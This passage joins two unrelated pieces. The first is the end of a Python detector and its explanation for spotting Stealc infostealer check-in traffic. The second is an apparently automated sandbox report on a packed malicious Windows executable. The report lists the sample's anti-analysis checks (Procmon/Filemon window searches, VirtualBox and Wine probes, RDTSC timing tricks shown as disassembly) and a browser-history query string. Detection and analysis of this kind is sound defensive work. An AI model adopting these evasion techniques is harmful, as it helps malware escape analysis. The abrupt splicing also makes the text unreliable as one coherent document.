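        "host_is_raw_ip": bool(re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", headers.get("host", ""))),
        "length_matches": headers.get("content-length") == str(len(body)),
    }
    verdict = all(indicators[k] for k in ("no_user_agent", "hwid_build_first", "length_matches"))
    return verdict, {"fields": fields, "indicators": indicators}


if __name__ == "__main__":
    for label, req in (("captured", CAPTURED_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, *looks_like_stealc_checkin(req))
```

The hwid format and the raw-IP Host are reported but not required for the verdict: a .php upload with no User-Agent and hwid/build as its first two fields is specific enough to alert on, while the other two traits are what you would pivot on when hunting for further check-ins to the same infrastructure. The Content-Length check matters when the parser is fed reassembled TCP streams rather than complete requests, since a truncated body would otherwise yield a partial field list and a misleading verdict.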

              System Summary

Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F848B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0131704E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01313B2A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013D7BA4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01322A60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01318A80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0131C52C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01324563
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0131DC75
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0130AC4B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0131A49E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01320FA5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0120A793
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01311FF7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01325FEE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013287CA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01329687
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0131F6F9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0127A6DB
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00F64A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: imljxmgr ZLIB complexity 0.9949059359060906
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F83A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle | 0_2_00F83A50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00F7CAE0
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\TQ9RDVLV.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.1738692638.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT url FROM moz_places LIMIT 1000f;4G
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1812480 > 1048576
Source: file.exe | Static PE information: Raw size of imljxmgr is bigger than: 0x100000 < 0x1a0a00

              Data Obfuscation

              Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.f60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;imljxmgr:EW;joqxgqti:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;imljxmgr:EW;joqxgqti:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F86390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_00F86390
              Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
              Source: file.exe | Static PE information: real checksum: 0x1ca1ee should be: 0x1c4341
              Source: file.exe | Static PE information: section name:
              Source: file.exe | Static PE information: section name: .idata
              Source: file.exe | Static PE information: section name:
              Source: file.exe | Static PE information: section name: imljxmgr
              Source: file.exe | Static PE information: section name: joqxgqti
              Source: file.exe | Static PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01391937 push 082722E2h; mov dword ptr [esp], esi | 0_2_013919AC
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013BE12B push edx; mov dword ptr [esp], esp | 0_2_013BE146
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013AA90D push edx; mov dword ptr [esp], ebx | 0_2_013AA911
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01357970 push eax; mov dword ptr [esp], edi | 0_2_0135797A
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01357970 push eax; mov dword ptr [esp], ebp | 0_2_01357986
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F87895 push ecx; ret | 0_2_00F878A8
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013D8145 push 7288355Fh; mov dword ptr [esp], ebp | 0_2_013D8202
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013CF143 push edi; mov dword ptr [esp], 5EFB24E2h | 0_2_013CF182
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013E01B9 push esi; mov dword ptr [esp], 7FCC57AFh | 0_2_013E01CD
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_014009CC push edi; mov dword ptr [esp], ecx | 0_2_014009D0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_014009CC push edi; mov dword ptr [esp], 6FFFFBEAh | 0_2_01400B39
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013EB1AA push 1029D1A9h; mov dword ptr [esp], edi | 0_2_013EB216
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0138899F push 764D459Bh; mov dword ptr [esp], eax | 0_2_013889C3
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0138899F push eax; mov dword ptr [esp], edx | 0_2_013889DB
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012F8184 push 3F9020E9h; mov dword ptr [esp], ebx | 0_2_012F8199
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013B5989 push edi; mov dword ptr [esp], ebp | 0_2_013B59A8
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011EC9CD push ebp; mov dword ptr [esp], 00000004h | 0_2_011EC9E4
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011EC9CD push esi; mov dword ptr [esp], ebx | 0_2_011ECA4F
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013A91D5 push 05CE06AAh; mov dword ptr [esp], ecx | 0_2_013A91DD
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012A702B push edx; mov dword ptr [esp], ebp | 0_2_012A7042
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012A702B push edx; mov dword ptr [esp], edi | 0_2_012A7094
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012A702B push 12083B20h; mov dword ptr [esp], ecx | 0_2_012A70A4
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012A702B push edi; mov dword ptr [esp], 3FF7CD2Dh | 0_2_012A70AE
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013F681E push ebp; mov dword ptr [esp], eax | 0_2_013F6869
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0140D803 push ecx; mov dword ptr [esp], 32F24093h | 0_2_0140D838
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0140D803 push ecx; mov dword ptr [esp], edi | 0_2_0140D85E
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01399059 push 21721EB4h; mov dword ptr [esp], ebx | 0_2_013990BA
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0140E828 push ebx; mov dword ptr [esp], esi | 0_2_0140E870
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0140A034 push ebp; mov dword ptr [esp], 24B7432Bh | 0_2_0140A063
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0140A034 push edx; mov dword ptr [esp], 2BEFEAB0h | 0_2_0140A0D9
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013EE846 push edi; mov dword ptr [esp], 67FF3C4Fh | 0_2_013EE880
              Source: file.exe | Static PE information: section name: imljxmgr entropy: 7.953583121368327

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F86390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_00F86390

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-25894
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11AF8DA second address: 11AF8DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132F36B second address: 132F37E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BDFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132E492 second address: 132E4A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FEA188F2DBDh 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132E4A6 second address: 132E4AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132E4AC second address: 132E4B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132E4B0 second address: 132E4BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BDAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132E5DA second address: 132E5EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188F2DBCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13319D8 second address: 11AF8DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FEA188A9BE9h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 60F6C3E9h 0x00000012 push dword ptr [ebp+122D1675h] 0x00000018 mov di, 1DFDh 0x0000001c call dword ptr [ebp+122D2C19h] 0x00000022 pushad 0x00000023 pushad 0x00000024 pushad 0x00000025 jne 00007FEA188A9BD6h 0x0000002b mov cx, di 0x0000002e popad 0x0000002f mov dword ptr [ebp+122D2019h], ecx 0x00000035 popad 0x00000036 xor eax, eax 0x00000038 stc 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d or dword ptr [ebp+122D2019h], edi 0x00000043 mov dword ptr [ebp+122D2ACCh], eax 0x00000049 pushad 0x0000004a push ebx 0x0000004b adc si, D048h 0x00000050 pop edi 0x00000051 mov dword ptr [ebp+122D1E04h], eax 0x00000057 popad 0x00000058 sub dword ptr [ebp+122D1BB8h], edi 0x0000005e mov esi, 0000003Ch 0x00000063 or dword ptr [ebp+122D37A4h], ebx 0x00000069 add esi, dword ptr [esp+24h] 0x0000006d add dword ptr [ebp+122D1BD1h], ecx 0x00000073 lodsw 0x00000075 js 00007FEA188A9BE3h 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f clc 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 pushad 0x00000085 mov ebx, dword ptr [ebp+122D289Ch] 0x0000008b mov esi, dword ptr [ebp+122D2A4Ch] 0x00000091 popad 0x00000092 nop 0x00000093 push eax 0x00000094 push edx 0x00000095 jmp 00007FEA188A9BDFh 0x0000009a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1331A81 second address: 1331A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1331B2B second address: 1331B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188A9BDBh 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1331C84 second address: 1331CC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FEA188F2DB6h 0x00000009 jnl 00007FEA188F2DB6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 jmp 00007FEA188F2DBEh 0x00000019 push eax 0x0000001a jmp 00007FEA188F2DC0h 0x0000001f pop eax 0x00000020 popad 0x00000021 mov eax, dword ptr [esp+04h] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jne 00007FEA188F2DB6h 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1331CC7 second address: 1331CD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1331CD5 second address: 1331CE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA188F2DBBh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1331CE4 second address: 1331CFC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEA188A9BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007FEA188A9BD6h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1331CFC second address: 1331D02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1331D02 second address: 1331D2C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEA188A9BECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1331D2C second address: 1331D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEA188F2DBCh 0x0000000a popad 0x0000000b pop eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FEA188F2DB8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov esi, dword ptr [ebp+122D29E8h] 0x0000002c push 00000003h 0x0000002e mov ecx, dword ptr [ebp+122D281Ch] 0x00000034 push 00000000h 0x00000036 mov dword ptr [ebp+122D1C21h], ebx 0x0000003c push 00000003h 0x0000003e cld 0x0000003f push 9BD5128Eh 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FEA188F2DC6h 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1331D92 second address: 1331DC2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEA188A9BD8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 5BD5128Eh 0x00000013 xor dword ptr [ebp+122D3801h], ebx 0x00000019 lea ebx, dword ptr [ebp+124558D3h] 0x0000001f mov edx, dword ptr [ebp+122D2A9Ch] 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jns 00007FEA188A9BD8h 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1331E21 second address: 1331E8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FEA188F2DBDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jno 00007FEA188F2DC7h 0x00000014 nop 0x00000015 mov esi, dword ptr [ebp+122D2944h] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FEA188F2DB8h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 sub di, 2CC4h 0x0000003c add dword ptr [ebp+122D221Eh], eax 0x00000042 push CFC862F6h 0x00000047 push esi 0x00000048 push eax 0x00000049 push edx 0x0000004a push ebx 0x0000004b pop ebx 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1331E8E second address: 1331E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1331E92 second address: 1331F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 add dword ptr [esp], 30379D8Ah 0x0000000e mov si, 32A3h 0x00000012 push 00000003h 0x00000014 mov cx, 5B0Bh 0x00000018 push 00000000h 0x0000001a mov esi, edx 0x0000001c push 00000003h 0x0000001e mov esi, 5C4D1A24h 0x00000023 push 69799860h 0x00000028 push esi 0x00000029 jmp 00007FEA188F2DC0h 0x0000002e pop esi 0x0000002f add dword ptr [esp], 568667A0h 0x00000036 push ebx 0x00000037 push eax 0x00000038 mov dword ptr [ebp+122D27F7h], ecx 0x0000003e pop ecx 0x0000003f pop ecx 0x00000040 jnl 00007FEA188F2DBCh 0x00000046 lea ebx, dword ptr [ebp+124558DEh] 0x0000004c or di, 39CFh 0x00000051 xchg eax, ebx 0x00000052 pushad 0x00000053 pushad 0x00000054 pushad 0x00000055 popad 0x00000056 pushad 0x00000057 popad 0x00000058 popad 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1331F00 second address: 1331F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1352517 second address: 135252F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEA188F2DB6h 0x00000008 js 00007FEA188F2DB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jng 00007FEA188F2DB8h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13506C6 second address: 13506D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FEA188A9BD6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13506D3 second address: 13506F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188F2DC0h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e jbe 00007FEA188F2DB6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1350AB8 second address: 1350AC8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEA188A9BD6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1350AC8 second address: 1350ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1350C1E second address: 1350C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1350C24 second address: 1350C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1350C28 second address: 1350C40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FEA188A9BD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEA188A9BDAh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1350C40 second address: 1350C4A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEA188F2DB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1350F2D second address: 1350F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop esi 0x0000000a pushad 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push edx 0x00000010 jno 00007FEA188A9BD6h 0x00000016 pop edx 0x00000017 pushad 0x00000018 jno 00007FEA188A9BD6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1351212 second address: 1351216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1351216 second address: 135121C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13514DE second address: 13514E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1344BD6 second address: 1344BDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1344BDA second address: 1344BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1344BE0 second address: 1344BFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA188A9BE8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1351F01 second address: 1351F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 135203A second address: 135207C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jno 00007FEA188A9BD6h 0x00000012 jmp 00007FEA188A9BE7h 0x00000017 jne 00007FEA188A9BD6h 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1325B06 second address: 1325B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FEA188F2DB6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1325B10 second address: 1325B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1325B14 second address: 1325B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1356FF8 second address: 1356FFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 135BFD6 second address: 135BFDC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
